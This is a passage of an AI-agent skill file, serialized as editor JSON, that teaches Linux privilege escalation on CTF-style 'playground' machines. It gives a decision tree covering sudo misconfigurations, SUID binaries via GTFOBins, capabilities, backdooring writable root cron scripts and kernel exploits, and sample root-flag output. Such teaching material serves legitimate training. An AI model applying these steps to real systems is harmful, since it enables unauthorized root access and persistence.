Backup files\nfind / -name \"*.bak\" -o -name \"*.backup\" 2>/dev/null","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Output Format","type":"text"}]},{"type":"paragraph","content":[{"text":"After successful privilege escalation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"json"},"content":[{"text":"{\n \"status\": \"root_access_gained\",\n \"method\": \"Sudo vim exploitation via GTFOBins\",\n \"vector\": \"sudo -l showed vim with NOPASSWD\",\n \"root_flag\": \"f6e5d4c3b2a1098765432109876543210\",\n \"exploitation_time\": \"2 minutes\",\n \"mission_complete\": true\n}","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Success Criteria","type":"text"}]},{"type":"paragraph","content":[{"text":"Mission complete when:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Root access obtained (uid=0)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Root flag located and read","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Flag is 32-character hexadecimal string","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Both user and root flags captured","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ State file updated with both flags","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Decision Tree","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Initial Access Gained\n│\n├─ Run: sudo -l\n│ ├─ Can sudo something? → GTFOBins → Root\n│ └─ No sudo → Continue\n│\n├─ Find SUID binaries\n│ ├─ Found unusual SUID? → GTFOBins → Root\n│ └─ No exploitable SUID → Continue\n│\n├─ Check capabilities\n│ ├─ cap_setuid on python/perl? 
→ Exploit → Root\n│ └─ No caps → Continue\n│\n├─ Check cron jobs\n│ ├─ Writable script run as root? → Backdoor → Wait → Root\n│ └─ No cron → Continue\n│\n├─ Run linpeas\n│ └─ Follow red/yellow findings\n│\n└─ Kernel exploit (last resort)\n └─ Search and compile exploit","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Key Principles","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Systematic approach","type":"text","marks":[{"type":"strong"}]},{"text":" - Don't skip steps, check everything","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Quick wins first","type":"text","marks":[{"type":"strong"}]},{"text":" - sudo before kernel exploits","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GTFOBins is your friend","type":"text","marks":[{"type":"strong"}]},{"text":" - Use it for SUID/sudo","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify before claiming","type":"text","marks":[{"type":"strong"}]},{"text":" - Ensure you have actual root","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Capture the flag","type":"text","marks":[{"type":"strong"}]},{"text":" - Read root.txt content, not just location","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Non-interactive aware","type":"text","marks":[{"type":"strong"}]},{"text":" - Some exploits need TTY, adapt accordingly","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Remember","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Most playground machines have obvious privesc vectors","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Sudo 
misconfigurations are most common","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SUID binaries are second most common","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Kernel exploits are rarely needed in playgrounds","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"The root flag MUST be read - don't declare success without it","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document successful method for learning and future reference","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Mission Complete","type":"text"}]},{"type":"paragraph","content":[{"text":"When you can execute:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# whoami\nroot\n# cat /root/root.txt\na1b2c3d4e5f6789... (32-char hex)","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Mission accomplished! 
Update coordinator with both flags.","type":"text"}]}]},"metadata":{"date":"2026-06-05","name":"privilege-escalation-knowledge","author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/charleskozel/privilege-escalation-knowledge/SKILL.md","repo_owner":"aiskillstore","body_sha256":"16c8115e3807fc4c2b33b3d907809f8f99b14e21a75d112c3fc022cd9fbd191e","cluster_key":"0f02061e8cffc9d67f63f754aa12c69b234ca83d8e492ac99e46f03d0d4e15b9","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/charleskozel/privilege-escalation-knowledge/SKILL.md","attachments":[{"id":"8d422fed-2642-5f8f-a265-d1281cdf2366","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/8d422fed-2642-5f8f-a265-d1281cdf2366/attachment.json","path":"skill-report.json","size":8399,"sha256":"fedda8e20fff5de14a2d3905bc6266691960a6ca7b39add9807eb6c8033ce5ff","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"3304dcfc465b408e232020329b29ac4007e3b1c23a98aac752d902e4eea910cc","attachment_count":1,"text_attachments":1,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/charleskozel/privilege-escalation-knowledge/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and exploiting privesc vectors including SUID binaries, sudo permissions, capabilities, kernel exploits, cron jobs, and common misconfigurations. Includes systematic approach to capturing root flags."}},"renderedAt":1782979946041}
